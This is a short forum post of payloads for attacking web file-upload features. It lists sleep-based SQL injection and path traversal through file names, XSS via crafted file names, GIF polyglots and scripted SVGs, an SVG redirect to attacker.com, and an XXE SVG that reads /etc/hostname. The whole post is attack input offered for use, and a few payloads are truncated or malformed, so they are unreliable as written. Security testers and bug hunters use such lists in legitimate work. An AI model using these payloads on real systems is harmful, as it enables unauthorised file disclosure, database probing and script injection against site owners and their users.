Home Forums Tips And Tricks Chaining Vulnerabilities through File Upload

  • Chaining Vulnerabilities through File Upload

    Posted by Mynk0x00  on May 5, 2024 at 7:02 am

    SLQi

    'sleep(20).jpg
    sleep(25)-- -.jpg
    Path traversal
    ../../etc/passwd/logo.png
    ../../../logo.png

    XSS

    ->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
    -> Upload using .gif file
    GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
    -> Upload using .svg file
    <svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
    -> <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script type="text/javascript">
    alert("HolyBugx XSS");
    </script>
    </svg>

    Open redirect

    <code>
    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <svg
    onload="window.location='attacker.com'"
    xmlns="w3.org/2000/svg">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    </svg>
    </code>

    XXE

    <?xml version="1.0" standalone="yes"?>
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
    <svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
    <text font-size="40" x="0" y="16">&xxe;</text>
    </svg>
    Mynk0x00  replied 5 months, 2 weeks ago 1 Member · 0 Replies
  • 0 Replies

Sorry, there were no replies found.

Reply to: Mynk0x00
SLQi 'sleep(20).jpgsleep(25)-- -.jpgPath traversa…
Cancel
Your information:

Start of Discussion
0 of 0 replies June 2018
Now